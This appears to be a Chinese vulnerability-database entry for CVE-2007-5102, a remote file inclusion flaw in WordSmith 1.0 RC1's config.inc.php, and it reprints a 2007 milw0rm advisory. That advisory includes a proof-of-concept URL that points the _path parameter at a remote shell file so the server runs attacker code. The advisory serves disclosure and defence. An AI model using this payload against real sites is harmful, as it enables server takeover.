Wordsmith Wordsmith Wordsmith 代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113682 漏洞类型 代码注入
发布时间 2007-09-23 更新时间 2007-09-26
CVE编号 CVE-2007-5102 CNNVD-ID CNNVD-200709-398
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/4446
https://www.securityfocus.com/bid/85368
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200709-398
|漏洞详情
Wordsmith1.0RC1中的config.inc.php存在PHP远程文件包含漏洞,当全局注册(register_globals)被激活时,远程攻击者可以借助_path参数的一个URL执行任意PHP代码。
|漏洞EXP
--==+=================== Electronic Security Team (www.Yee7.com) ====================+==--
--==+            WordSmith 1.0 RC1 (config.inc.php) Remote File Inclusion            +==--
--==+================================================================================+==--

Software:     WordSmith 1.0 RC1
SF page:      http://sourceforge.net/news/?group_id=90418
exploit:      Remote File Inclusion [High Risk]
By:           ShockShadow - Electronic Security Team (www.Yee7.com)
Home:         www.Yee7.com
Download:     http://skrypty.webpc.pl/pobierz13.html

##############################

==============
Dork: built in ;)

PoC:
http://domain.com/Script_Path/config.inc.php?_path=http://shell.txt?
###############################

by: ShockShadow
Thanks to: Mr-m07, Al-Shikh, ThE WhitE WolF, HuRrIcAnE, S0m.Ph, KEENEST, Qanas Alyahood, Falcon Hammdan, ArabHacker
AND ALL FRIENDS 

# milw0rm.com [2007-09-23]
|受影响的产品
Wordsmith Wordsmith 1.0 Rc1
|参考资料

来源:SECUNIA
名称:26924
链接:http://secunia.com/advisories/26924
来源:OSVDB
名称:37223
链接:http://osvdb.org/37223
来源:MILW0RM
名称:4446
链接:http://milw0rm.com/exploits/4446
来源:XF
名称:wordsmith-config-file-include(36746)
链接:http://xforce.iss.net/xforce/xfdb/36746
来源:VUPEN
名称:ADV-2007-3251
链接:http://www.frsirt.com/english/advisories/2007/3251